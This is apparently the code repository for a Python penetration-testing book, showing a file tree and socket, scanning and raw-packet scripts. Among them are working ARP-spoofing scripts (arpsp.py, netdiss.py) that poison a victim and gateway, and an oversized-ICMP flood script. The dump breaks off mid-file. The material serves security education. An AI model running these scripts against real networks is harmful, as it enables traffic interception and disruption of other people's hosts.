├── .gitattributes ├── License ├── Module 1 ├── Chapter 10 │ ├── multi_process.py │ └── multi_threaded.py ├── Chapter 2 │ ├── hostdetails.py │ └── publicip.py ├── Chapter 3 │ ├── ifacesdetails.py │ ├── nmap_scannner.py │ └── ssh_login.py ├── Chapter 4 │ ├── smtp_vrfy.py │ └── username_generator.py ├── Chapter 5 │ ├── msfrpc.rc │ └── msfrpc_smb.py ├── Chapter 6 │ ├── dirtester.py │ ├── headrequest.py │ ├── httplib2_brute.py │ └── request_brute.py ├── Chapter 7 │ ├── banner_grabber.py │ ├── rfinetcatexecute.php │ ├── rfipayloadexecute.php │ ├── rfiping.php │ ├── rfiuseradd.php │ ├── tcpdump.sh │ └── tftp_download.py ├── Chapter 8 │ ├── ftp_exploit.py │ ├── mp3_exploit.py │ ├── tcp_exploit.py │ ├── udp_exploit.py │ └── wrapper_exploit.py ├── Chapter 9 │ ├── nmap_doc_generator.py │ └── nmap_parser.py ├── LICENSE.md ├── README.md └── setup.sh ├── Module 2 ├── Chapter 1 │ └── first chapter _programs │ │ ├── clientside │ │ ├── client1.py │ │ ├── client3.py.py │ │ └── udp2.py │ │ ├── connect_ex.py │ │ ├── getadd1.py │ │ ├── server1.py │ │ ├── server2.py │ │ ├── server3.py │ │ ├── udp1.py │ │ ├── udptime1.py │ │ └── udptime2.py ├── Chapter 2 │ └── Programs │ │ ├── iptcpscan.py │ │ ├── iptcpscan_t.py │ │ ├── iptcpscan_t_l.py │ │ ├── mohit.raj │ │ ├── ping_sweep.py │ │ ├── ping_sweep_th.py │ │ ├── ping_sweep_th_l.py │ │ ├── portsc14.py │ │ └── updatec.py ├── Chapter 3 │ └── Chapter 3 │ │ ├── ack.py │ │ ├── arpsp.py │ │ ├── client side │ │ └── unstruc.py │ │ ├── eth.py │ │ ├── fin.py │ │ ├── halfopen.py │ │ ├── netdiss.py │ │ ├── pingofd.py │ │ ├── sniffer1.py │ │ ├── str1.py │ │ └── struct1.py ├── Chapter 4 │ └── Chapter 4 │ │ ├── deauth.py │ │ ├── first_ssid_sniffer.py │ │ ├── mac_d.py │ │ ├── mac_flood.py │ │ ├── probe_req.py │ │ ├── scapy_ssid.py │ │ └── ssid.py ├── Chapter 5 │ └── Programs │ │ ├── banner.py │ │ ├── div.py │ │ ├── header.py │ │ ├── info.py │ │ ├── par3.py │ │ └── whois.py ├── Chapter 6 │ └── Programs │ │ ├── DDOS_detect1.py │ │ ├── mimp.py │ │ ├── 
parameter temp.py │ │ ├── simp.py │ │ └── sisp.py └── Chapter 7 │ ├── Python program files │ ├── mohit.raj │ └── mohit.xss │ ├── comment.sql │ ├── comment_xss_web │ ├── Screenshot.png │ ├── comm.html │ ├── comm.html~ │ ├── connect.php │ ├── connect.php~ │ ├── dis.php │ ├── dis.php~ │ ├── disp.php~ │ ├── hack.html~ │ ├── in.html │ ├── index (another copy).php │ ├── index (copy).php │ ├── index.php │ ├── index.php~ │ ├── login.php │ ├── mmm.php~ │ ├── movies.html │ ├── movies.html~ │ ├── new.html │ ├── submit (copy).php │ ├── submit.php │ ├── submit.php~ │ ├── upload │ │ ├── new.html │ │ ├── upload.php │ │ ├── upload.php~ │ │ └── upload_file.php~ │ └── wel.jpg │ ├── data_handler.py │ ├── htm_sql_web │ ├── Chap10_Eg01.html~ │ ├── Welcome to Facebook - Log In, Sign Up or Learn More_files │ │ ├── 851558_160351450817973_1678868765_n.png │ │ ├── 851565_602269956474188_918638970_n.png │ │ ├── 851585_216271631855613_2121533625_n.png │ │ ├── BPIOtBFaNNP.js │ │ ├── DHqcHvznmxi.js │ │ ├── DIRB97fDvPv.js │ │ ├── Dp4ZyEUChD-.css │ │ ├── GsNJNwuI-UM.gif │ │ ├── NEfdYpfy3BJ.js │ │ ├── QM9Ch6kMle9.js │ │ ├── aPGRKdTiwOZ.css │ │ ├── b9A6iGH4Mhb.js │ │ ├── dVDIw5SgUkG.js │ │ ├── fsstOybDL_F.css │ │ ├── hH060TR7d7-.js │ │ ├── sD_-OUjPR3s.js │ │ ├── uI_8airZaGr.js │ │ ├── vGXdh-QRY8J.js │ │ ├── wDeFc95XQ9B.css │ │ └── x3bsMJyVkPp.css │ ├── adds │ │ ├── Thumbs.db │ │ ├── add1_detail.jpg │ │ ├── add1_thumb.jpg │ │ ├── add2_detail.jpg │ │ ├── add2_thumb.jpg │ │ ├── add3_detail.jpg │ │ ├── add3_thumb.jpg │ │ ├── add4_detail.jpg │ │ └── add4_thumb.jpg │ ├── addtocart.php │ ├── admin.php~ │ ├── admin │ │ ├── addCategory.php │ │ ├── addProduct-withoutAJAX.php │ │ ├── addProduct.php │ │ ├── deleteProduct.php │ │ ├── editProduct.php │ │ ├── getCategoryList.php │ │ ├── index-old20-12-11.php │ │ ├── index.php │ │ ├── leftmenu-old30-12-11.php │ │ ├── leftmenu.php │ │ ├── logout.php │ │ ├── maincontent.php │ │ ├── styles │ │ │ └── admin.css │ │ ├── viewCategory.php │ │ ├── 
viewProducts-old10-01-12.php │ │ └── viewProducts.php │ ├── ajax │ │ ├── ajax.php │ │ ├── ajax2.php │ │ ├── ajaxresponse.php │ │ ├── gethint.php │ │ └── jquery │ │ │ ├── fade.php │ │ │ ├── fadeout.php │ │ │ ├── fadeto.php │ │ │ ├── jq1.php │ │ │ ├── jq_ajax.php │ │ │ ├── js │ │ │ └── jquery-1.5.1.js │ │ │ ├── sjq.html │ │ │ ├── slideToggle.php │ │ │ └── testFile.txt │ ├── auth.php~ │ ├── bar.php │ ├── basics │ │ ├── Abstract.php │ │ ├── Clone.php │ │ ├── Error.php │ │ ├── Exception.php │ │ ├── FileProgramming.php │ │ ├── File_uploading.php │ │ ├── Inheritance.php │ │ ├── REGEX.php │ │ ├── Reflection.php │ │ ├── Strings.php │ │ ├── admins.csv │ │ ├── contacts.csv │ │ ├── counter.txt │ │ ├── customException.php │ │ ├── form.php │ │ ├── forms_GET.php │ │ ├── forms_POST.php │ │ ├── multipleException.php │ │ ├── testFile.txt │ │ └── uploaded │ │ │ ├── golden.gif │ │ │ ├── green.gif │ │ │ └── red.gif │ ├── cancelReturn.php │ ├── check.php~ │ ├── checkOut.php │ ├── classes │ │ ├── Cart.php │ │ ├── Category.php │ │ ├── Pagination.php │ │ ├── Product.php │ │ └── Template.php │ ├── comm.html │ ├── comm.html~ │ ├── config.php │ ├── config.php~ │ ├── confirmCheckout.php │ ├── cong.php~ │ ├── connect.php~ │ ├── datastore.php │ ├── db │ │ ├── 20111230.sql │ │ └── 20120110.sql │ ├── dis.php~ │ ├── disp.php~ │ ├── display.php~ │ ├── edit.php~ │ ├── editabout.php~ │ ├── editabout1.php~ │ ├── editdate.php~ │ ├── editdate1.php~ │ ├── editmail.php~ │ ├── editname.php~ │ ├── editname1.php~ │ ├── emptycart.php │ ├── formpage.html~ │ ├── hack.html │ ├── home (copy).php~ │ ├── home.php~ │ ├── home1.php~ │ ├── images │ │ ├── Extra │ │ │ ├── Thumbs.db │ │ │ ├── menuActive.jpg │ │ │ ├── menu_bg.png │ │ │ ├── menu_bgx.jpg │ │ │ ├── menu_bgxx.jpg │ │ │ └── menu_hvrxxx.jpg │ │ ├── Thumbs.db │ │ ├── footer_bg.jpg │ │ ├── menu_bg.jpg │ │ ├── menu_hvr.jpg │ │ └── menu_hvr.psd │ ├── include │ │ ├── adds.php │ │ ├── footerMenu.php │ │ └── headerMenu.php │ ├── index.php │ ├── index.php~ │ ├── 
ins.html~ │ ├── ins.php~ │ ├── inse.php~ │ ├── insert.php~ │ ├── inst.php~ │ ├── login.php~ │ ├── logout.php~ │ ├── mainContents.php │ ├── mmm.php~ │ ├── paypallReturn.php │ ├── process.php~ │ ├── reg.php~ │ ├── register.php~ │ ├── register2.php~ │ ├── removeItem.php │ ├── somepage.php~ │ ├── style │ │ └── php90.css │ ├── submit.php~ │ ├── testimages │ │ ├── AddToCart.gif │ │ ├── FeaturedProducts.jpg │ │ ├── FeaturedProducts1.jpg │ │ ├── NewsBanner.jpg │ │ ├── Thumbs.db │ │ ├── backgrounds │ │ │ ├── Thumbs.db │ │ │ ├── black_brown.jpg │ │ │ ├── prem_top_bg1.jpg │ │ │ ├── rew_un_top1.jpg │ │ │ ├── round.png │ │ │ ├── rs_logo_deko_big.png │ │ │ ├── st_top_fl4.gif │ │ │ ├── top_green.png │ │ │ ├── top_green_2.gif │ │ │ └── white-background-home-top.jpg │ │ ├── computer │ │ │ ├── Acer-Aspire-5336.jpg │ │ │ ├── Acer-Extensa-5620.jpg │ │ │ ├── Asus-1015.jpg │ │ │ ├── Dell-380 MT.jpg │ │ │ ├── Dell-4700C.gif │ │ │ ├── Dell-Inspiron-15R-N5010.jpg │ │ │ ├── Dell-XPS-One.gif │ │ │ ├── Dell.jpg │ │ │ ├── Dell_GX270.jpg │ │ │ ├── Dell_Studio_17.gif │ │ │ ├── HP-9100.jpg │ │ │ ├── HP-Pavilion-DV6.jpg │ │ │ ├── HP-Pavilion.gif │ │ │ ├── Lenovo-30113HU.jpg │ │ │ ├── Lenovo-C315.jpg │ │ │ ├── Lenovo-Essential.jpg │ │ │ ├── Lenovo-IdeaCenter-A700.jpg │ │ │ ├── Lenovo-IdeaPad-U260.jpg │ │ │ ├── Lenovo-IdeaPad-Y560.jpg │ │ │ ├── Lenovo-M58.jpg │ │ │ ├── Lenovo-ThinkCentre-A57.jpg │ │ │ ├── Lenovo-Thinkpad-X100E.jpg │ │ │ ├── Lenovo-W700.jpg │ │ │ ├── Lenovo_G450.gif │ │ │ ├── Sony_Vaio_FW260J.gif │ │ │ ├── Thumbs.db │ │ │ ├── acer.jpg │ │ │ ├── asus.jpg │ │ │ ├── hp.png │ │ │ ├── hp_dx2000.jpg │ │ │ └── lenovo.gif │ │ ├── dod.gif │ │ ├── dod1.jpg │ │ ├── electronics │ │ │ ├── HDTV.jpg │ │ │ ├── HomeTheater.jpg │ │ │ ├── Samsung-Home-Theater-HT.gif │ │ │ ├── Sony-Bravia-KDL-52EX700.jpg │ │ │ ├── Sony-HT-SF2300.gif │ │ │ ├── Sony-XBR60LX900.jpg │ │ │ ├── Thumbs.db │ │ │ └── sony.jpg │ │ ├── footerbg.png │ │ ├── headerbg.png │ │ ├── hot_deals.png │ │ ├── hot_deals1.jpg │ │ ├── mobile │ 
│ │ ├── Nokia-5800-XpressMusic.jpg │ │ │ ├── Nokia-C7.jpg │ │ │ ├── Nokia-E71.gif │ │ │ ├── Nokia-N900.jpg │ │ │ ├── Nokia_N8.jpg │ │ │ ├── SE-C901.jpg │ │ │ ├── SE-Vivaz-Pro.jpg │ │ │ ├── SE-W995.jpg │ │ │ ├── SE-Zylo.jpg │ │ │ ├── SE_Aino.jpg │ │ │ ├── SE_Aino_U10i_Big.jpg │ │ │ ├── SE_Xperia_10.jpg │ │ │ ├── Samsung-Galaxy-S.jpg │ │ │ ├── Samsung-Wave.jpg │ │ │ ├── Thumbs.db │ │ │ ├── apple-iphone.jpg │ │ │ ├── iPhone-3G.jpg │ │ │ ├── iPhone-3GS.jpg │ │ │ ├── iPhone-4.jpg │ │ │ ├── nokia.jpg │ │ │ ├── samsung.png │ │ │ └── sonyericsson.jpg │ │ ├── music │ │ │ ├── Apple-iPod.jpg │ │ │ ├── Coby-MP-705-1GB.jpg │ │ │ ├── Sony-NWZ-E345-16-GB.jpg │ │ │ ├── Thumbs.db │ │ │ ├── iPod-Nano.jpg │ │ │ ├── iPod-Shuffle.jpg │ │ │ ├── iPod-Touch.jpg │ │ │ └── mp3player.jpg │ │ ├── networking │ │ │ ├── Belkin-Network-Cable-15M.png │ │ │ ├── Cisco-1811WAGBK9-RF.jpg │ │ │ ├── Linksys-WRT55AG-Wireless.gif │ │ │ ├── NetworkCable.jpg │ │ │ ├── NetworkRouter.jpg │ │ │ └── Thumbs.db │ │ ├── sos_logo.png │ │ ├── storeAd1.jpg │ │ ├── storeAd2.jpg │ │ ├── storeAd3.gif │ │ ├── storeAd4.jpg │ │ ├── storeBanner1.jpg │ │ ├── storeBanner2.jpg │ │ ├── storeBanner3.jpg │ │ ├── storeBanner4.jpg │ │ └── storeBanner5.jpg │ ├── updateBasket.php │ ├── verify.php~ │ └── viewCart.php │ ├── login1.py │ ├── sql_form6.py │ ├── sql_form7.py │ ├── xss.py │ ├── xss_data_handler.py │ └── xss_list.py ├── Module 3 ├── Chapter 1 │ ├── 1_shodan_info_gathering.py │ ├── 2_google_search_API.py │ ├── 3_google_profile_pics.py │ ├── 4_google_additional_results.py │ ├── 5_screenshots.py │ ├── 6_screenshot_by_port.py │ ├── 7_screenshot_by_port_threaded.py │ ├── 8_spidering_websites.py │ └── screenshot.py ├── Chapter 2 │ ├── URL-regex.txt │ ├── basicname.py │ ├── brutepasswords.py │ ├── bruteusernames.py │ ├── commentfinder.py │ ├── filebrute.py │ ├── scapypingsweep.py │ ├── scapyportscan.py │ └── usernamecheck.py ├── Chapter 3 │ ├── DirectoryTraversal.py │ ├── Fuzzer.py │ ├── Headerxss.py │ ├── Shellshocker.py │ ├── 
URL-XSS.py │ ├── XSSFinder.py │ └── jschecker.py ├── Chapter 4 │ ├── Subs.py │ ├── Timer.py │ ├── blindsql.py │ ├── booleanSQL.py │ └── urlsqli.py ├── Chapter 5 │ ├── basic_auth.py │ ├── clickjack.py │ ├── cookies.py │ ├── headers_enum.py │ ├── insecure_headers.py │ ├── send_cookies.py │ └── user_agent.py ├── Chapter 6 │ ├── StegoFull.py │ ├── StegoText.py │ ├── imgurClient.py │ └── imgurServer.py ├── Chapter 7 │ ├── All.py │ ├── Atbash.py │ ├── Base 64 encode.py │ ├── Bcrypt.py │ ├── KeyReuse.py │ ├── LCG-brute.py │ ├── MD5 crack.py │ ├── MD5.py │ ├── Real Example.py │ └── Sub.py ├── Chapter 8 │ ├── FTPExfil.py │ ├── HttpExfil.py │ ├── Netcat.py │ ├── TwitterDecode.py │ ├── TwitterExfil.py │ ├── data.php │ └── simpleHTTPExfil.py ├── Chapter 9 │ ├── bs2.py │ ├── bs3.py │ ├── maltegodef.py │ ├── nmapparser.py │ ├── pcapparse.py │ └── sslscanparser.py └── Read Me.txt ├── ReadMe.txt └── Readme.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /License: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2016 Packt 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 
| copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Module 1/Chapter 5/msfrpc.rc: -------------------------------------------------------------------------------- 1 | load msgrpc Pass=msfrpcpassword 2 | -------------------------------------------------------------------------------- /Module 1/README.md: -------------------------------------------------------------------------------- 1 | Before using any of these code snippets you should run the setup.sh file. 2 | Once that is complete you will be able to use the scripts without issue. 3 | All code here is provided to showcase ways you can link methods of 4 | exploiting systems with scripts and to fill voids that industry standard tools 5 | do not fill. Many new professionals ask why there are no tools that do 6 | these simple tasks. The answer is simple: why does a whole tool need to be 7 | created for simple tasks that are unique, but time consuming, to a particular environment? 8 | I hope you enjoy this book and the scripts provided as much as I have enjoyed writing it. 
9 | -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/clientside/client1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 | host = "192.168.0.1" 4 | port =12345 5 | s.connect((host,port)) 6 | print s.recv(1024) 7 | 8 | s.send("Hello Server") 9 | s.close() -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/clientside/client3.py.py: -------------------------------------------------------------------------------- 1 | import socket 2 | host = "192.168.0.1" 3 | port = 12345 4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 | s.connect((host, port)) 6 | buf = bytearray("-" * 30) # buffer created 7 | print "Number of Bytes ",s.recv_into(buf) 8 | print buf 9 | s.close -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/clientside/udp2.py: -------------------------------------------------------------------------------- 1 | import socket 2 | host = "192.168.0.1" 3 | port = 12346 4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 5 | print s.sendto("hello all",(host,port)) 6 | s.close() -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/connect_ex.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | rmip ='127.0.0.1' 4 | portlist = [22,23,80,912,135,445,20] 5 | 6 | for port in portlist: 7 | sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM) 8 | result = sock.connect_ex((rmip,port)) 9 | print port,":", result 10 | sock.close() 11 | 12 | -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/getadd1.py: 
-------------------------------------------------------------------------------- 1 | import socket 2 | def get_protnumber(prefix): 3 | return dict( (getattr(socket, a), a) 4 | for a in dir(socket) 5 | if a.startswith(prefix)) 6 | 7 | proto_fam = get_protnumber('AF_') 8 | types = get_protnumber('SOCK_') 9 | protocols = get_protnumber('IPPROTO_') 10 | 11 | for res in socket.getaddrinfo('www.thapar.edu', 'http'): 12 | 13 | family, socktype, proto, canonname, sockaddr = res 14 | 15 | print 'Family :', proto_fam[family] 16 | print 'Type :', types[socktype] 17 | print 'Protocol :', protocols[proto] 18 | print 'Canonical name:', canonname 19 | print 'Socket address:', sockaddr 20 | -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/server1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | host = "192.168.0.1" #Server address 3 | port = 12345 #Port of Server 4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 | s.bind((host,port)) #bind server 6 | s.listen(2) 7 | conn, addr = s.accept() 8 | print addr, "Now Connected" 9 | conn.send("Thank you for connecting") 10 | conn.close() 11 | -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/server2.py: -------------------------------------------------------------------------------- 1 | import socket 2 | host = "192.168.0.1" 3 | port = 12345 4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 | s.bind((host,port)) 6 | s.listen(2) 7 | while True: 8 | conn, addr = s.accept() 9 | print addr, "Now Connected" 10 | conn.send("Thank you for connecting") 11 | conn.close() 12 | -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/server3.py: -------------------------------------------------------------------------------- 1 | import socket 2 | host = 
"192.168.0.1" 3 | port = 12345 4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 | s.bind((host, port)) 6 | s.listen(1) 7 | conn, addr = s.accept() 8 | print "connected by", addr 9 | conn.send("Thanks") 10 | conn.close() 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/udp1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | host = "192.168.0.1" 3 | port = 12346 4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 5 | s.bind((host,port)) 6 | data, addr = s.recvfrom(1024) 7 | print "recevied from ",addr 8 | print "obtained ", data 9 | s.close() -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/udptime1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | host = "192.168.0.1" 3 | port = 12346 4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 5 | s.bind((host,port)) 6 | s.settimeout(5) 7 | data, addr = s.recvfrom(1024) 8 | print "recevied from ",addr 9 | print "obtained ", data 10 | s.close() -------------------------------------------------------------------------------- /Module 2/Chapter 1/first chapter _programs/udptime2.py: -------------------------------------------------------------------------------- 1 | import socket 2 | host = "192.168.0.1" 3 | port = 12346 4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 5 | try: 6 | 7 | s.bind((host,port)) 8 | s.settimeout(5) 9 | data, addr = s.recvfrom(1024) 10 | print "recevied from ",addr 11 | print "obtained ", data 12 | s.close() 13 | 14 | except socket.timeout : 15 | print "Client not connected" 16 | s.close() -------------------------------------------------------------------------------- /Module 2/Chapter 2/Programs/iptcpscan.py: -------------------------------------------------------------------------------- 1 | 
import socket 2 | from datetime import datetime 3 | net= raw_input("Enter the IP address ") 4 | net1= net.split('.') 5 | a = '.' 6 | net2 = net1[0]+a+net1[1]+a+net1[2]+a 7 | st1 = int(raw_input("Enter the Starting Number ")) 8 | en1 = int(raw_input("Enter the Last Number ")) 9 | en1=en1+1 10 | t1= datetime.now() 11 | def scan(addr): 12 | sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM) 13 | socket.setdefaulttimeout(1) 14 | result = sock.connect_ex((addr,445)) 15 | if result==0: 16 | return 1 17 | else : 18 | return 0 19 | 20 | def run1(): 21 | for ip in xrange(st1,en1): 22 | addr = net2+str(ip) 23 | if (scan(addr)): 24 | print addr , "is live" 25 | 26 | run1() 27 | t2= datetime.now() 28 | total =t2-t1 29 | print "scanning complete in " , total -------------------------------------------------------------------------------- /Module 2/Chapter 2/Programs/mohit.raj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-for-Developers/a712d19c9587d04e13b332adbc3620c0df477c89/Module 2/Chapter 2/Programs/mohit.raj -------------------------------------------------------------------------------- /Module 2/Chapter 2/Programs/ping_sweep.py: -------------------------------------------------------------------------------- 1 | import os 2 | import platform 3 | from datetime import datetime 4 | net = raw_input("Enter the Network Address ") 5 | net1= net.split('.') 6 | a = '.' 
7 | net2 = net1[0]+a+net1[1]+a+net1[2]+a 8 | st1 = int(raw_input("Enter the Starting Number ")) 9 | en1 = int(raw_input("Enter the Last Number ")) 10 | en1=en1+1 11 | oper = platform.system() 12 | 13 | if (oper=="Windows"): 14 | ping1 = "ping -n 1 " 15 | elif (oper== "Linux"): 16 | ping1 = "ping -c 1 " 17 | else : 18 | ping1 = "ping -c 1 " 19 | t1= datetime.now() 20 | print "Scanning in Progress" 21 | for ip in xrange(st1,en1): 22 | addr = net2+str(ip) 23 | comm = ping1+addr 24 | response = os.popen(comm) 25 | for line in response.readlines(): 26 | if(line.count("TTL")): 27 | break 28 | if (line.count("TTL")): 29 | print addr, "--> Live" 30 | 31 | t2= datetime.now() 32 | total =t2-t1 33 | print "scanning complete in " , total -------------------------------------------------------------------------------- /Module 2/Chapter 3/Chapter 3/ack.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | ip1 = IP(src="192.168.0.10", dst ="192.168.0.11") 3 | sy1 = TCP(sport =1024, dport=137, flags="A", seq=12345) 4 | packet = ip1/sy1 5 | p =sr1(packet) 6 | p.show() 7 | -------------------------------------------------------------------------------- /Module 2/Chapter 3/Chapter 3/arpsp.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | import binascii 4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800)) 5 | s.bind(("eth0",socket.htons(0x0800))) 6 | 7 | sor = '\x00\x0c\x29\x4f\x8e\x35' 8 | 9 | victmac ='\x00\x0C\x29\x2E\x84\x7A' 10 | 11 | gatemac = '\x00\x50\x56\xC0\x00\x08' 12 | code ='\x08\x06' 13 | eth1 = victmac+sor+code #for victim 14 | eth2 = gatemac+sor+code # for gateway 15 | 16 | htype = '\x00\x01' 17 | protype = '\x08\x00' 18 | hsize = '\x06' 19 | psize = '\x04' 20 | opcode = '\x00\x02' 21 | 22 | gate_ip = '192.168.0.1' 23 | victim_ip = '192.168.0.11' 24 | gip = socket.inet_aton ( gate_ip ) 25 | vip = 
socket.inet_aton ( victim_ip ) 26 | 27 | arp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip 28 | arp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip 29 | 30 | 31 | while 1: 32 | s.send(arp_victim) 33 | s.send(arp_gateway) 34 | 35 | 36 | -------------------------------------------------------------------------------- /Module 2/Chapter 3/Chapter 3/client side/unstruc.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | host = "192.168.0.1" 5 | port =12347 6 | s.connect((host,port)) 7 | msg= s.recv(1024) 8 | print msg 9 | print struct.unpack('hhl',msg) 10 | s.close() -------------------------------------------------------------------------------- /Module 2/Chapter 3/Chapter 3/eth.py: -------------------------------------------------------------------------------- 1 | import socket 2 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800)) 3 | s.bind(("eth0",socket.ntohs(0x0800))) 4 | 5 | sor = '\x00\x0c\x29\x4f\x8e\x35' 6 | 7 | des ='\x00\x0C\x29\x2E\x84\x7A' 8 | code ='\x08\x00' 9 | eth = des+sor+code 10 | s.send(eth) 11 | -------------------------------------------------------------------------------- /Module 2/Chapter 3/Chapter 3/fin.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | ip1 = IP(src="192.168.0.10", dst ="192.168.0.11") 3 | sy1 = TCP(sport =1024, dport=80, flags="F", seq=12345) 4 | packet = ip1/sy1 5 | p =sr1(packet) 6 | p.show() 7 | -------------------------------------------------------------------------------- /Module 2/Chapter 3/Chapter 3/halfopen.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | ip1 = IP(src="192.168.0.10", dst ="192.168.0.11" ) 3 | tcp1 = TCP(sport =1024, dport=80, flags="S", seq=12345) 4 | packet = ip1/tcp1 5 | p 
=sr1(packet, inter=1) 6 | p.show() 7 | 8 | rs1 = TCP(sport =1024, dport=80, flags="R", seq=12347) 9 | packet1=ip1/rs1 10 | p1 = sr1(packet1) 11 | p1.show 12 | 13 | -------------------------------------------------------------------------------- /Module 2/Chapter 3/Chapter 3/netdiss.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import binascii 3 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800)) 4 | s.bind(("eth0",socket.htons(0x0800))) 5 | 6 | def mach(mac): 7 | a = '\\x' 8 | mac1= mac.replace(':',a) 9 | mac2= a+mac1 10 | return mac2 11 | 12 | sor = '\x48\x41\x43\x4b\x45\x52' 13 | 14 | 15 | vic1 = raw_input("Enter the Victim MAC ") 16 | victmac = mach(vic1) 17 | print victmac 18 | 19 | gate1 = raw_input("Enter the gateway MAC ") 20 | gatemac = mach(gate1) 21 | print gatemac 22 | code ='\x08\x06' 23 | eth1 = victmac+sor+code #for victim 24 | eth2 = gatemac+sor+code # for gateway 25 | 26 | htype = '\x00\x01' 27 | protype = '\x08\x00' 28 | hsize = '\x06' 29 | psize = '\x04' 30 | opcode = '\x00\x02' 31 | 32 | 33 | gate_ip = '192.168.0.1' 34 | victim_ip = '192.168.0.11' 35 | gip = socket.inet_aton ( gate_ip ) 36 | 37 | vip = socket.inet_aton ( victim_ip ) 38 | 39 | 40 | arp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip 41 | arp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip 42 | 43 | 44 | while 1: 45 | s.send(arp_victim) 46 | s.send(arp_gateway) 47 | 48 | 49 | -------------------------------------------------------------------------------- /Module 2/Chapter 3/Chapter 3/pingofd.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | ip1 = IP(src="192.168.0.99", dst ="192.168.0.11") 3 | 4 | packet = ip1/ICMP()/("m"*60000) 5 | send(packet) 6 | i=0 7 | while i<20 : 8 | send(packet) 9 | i = i+1 10 | -------------------------------------------------------------------------------- /Module 
2/Chapter 3/Chapter 3/sniffer1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | import binascii 4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8) 5 | while True: 6 | 7 | pkt = s.recvfrom(2048) 8 | ethhead = pkt[0][0:14] 9 | print pkt[0] 10 | eth = struct.unpack("!6s6s2s",ethhead) 11 | print "--------Ethernet Frame--------" 12 | print "desination mac",binascii.hexlify(eth[0]) 13 | print "Source mac",binascii.hexlify(eth[1]) 14 | binascii.hexlify(eth[2]) 15 | 16 | ipheader = pkt[0][14:34] 17 | ip_hdr = struct.unpack("!8sB3s4s4s",ipheader) 18 | print "-----------IP------------------" 19 | print "TTL :", ip_hdr[1] 20 | print "Source IP", socket.inet_ntoa(ip_hdr[3]) 21 | print "Destination IP", socket.inet_ntoa(ip_hdr[4]) 22 | print "---------TCP----------" 23 | tcpheader = pkt[0][34:54] 24 | #tcp_hdr = 